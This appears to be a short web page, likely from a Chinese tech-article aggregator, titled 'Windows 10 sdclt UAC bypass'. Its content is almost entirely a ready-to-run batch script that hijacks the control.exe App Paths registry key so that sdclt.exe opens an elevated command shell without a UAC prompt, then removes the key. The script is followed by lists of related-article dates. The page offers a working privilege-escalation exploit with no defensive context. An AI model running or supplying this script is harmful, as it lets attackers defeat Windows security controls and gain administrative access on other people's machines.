Windows 10 sdclt UAC bypass

 

@echo off

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /t REG_SZ /d %COMSPEC% /f
sdclt
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f

 

相关文章:

  • 2021-08-22
  • 2021-08-30
  • 2021-08-05
  • 2021-07-02
  • 2022-12-23
  • 2022-12-23
  • 2021-11-27
  • 2021-07-08
猜你喜欢
  • 2021-09-22
  • 2021-07-10
  • 2021-11-27
  • 2022-01-05
  • 2021-09-11
  • 2022-12-23
  • 2021-06-13
相关资源
相似解决方案